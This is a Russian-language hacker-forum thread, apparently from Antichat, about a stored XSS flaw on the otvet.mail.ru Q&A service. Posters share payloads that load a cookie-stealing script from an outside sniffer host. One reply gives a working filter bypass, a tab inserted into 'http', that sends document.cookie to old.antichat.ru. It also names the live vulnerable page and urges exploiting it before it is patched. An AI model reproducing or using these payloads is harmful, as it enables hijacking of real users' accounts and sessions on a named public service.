Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш Code: %3Cscript%3Ealert(%22XSS%22)%3C/script%3E то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ Code: <scriptsrc="http://www.naxodka.net/cookie.js"></script> . Всё равно фильтрует гад, вот результат фильтрации Code: <script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script> . По моему эта тема интерестна всем, так давайте её раскрутим, а?!!!
Ура!=) тоже сначала кодировал в разные кодировки результата 0. достачно было поставить табуляцию между ht и tp вот весь код: Code: %3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E страница с xss: http://otvet.mail.ru/question/2334480/ юзаем пока не прикрыли=\
Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...
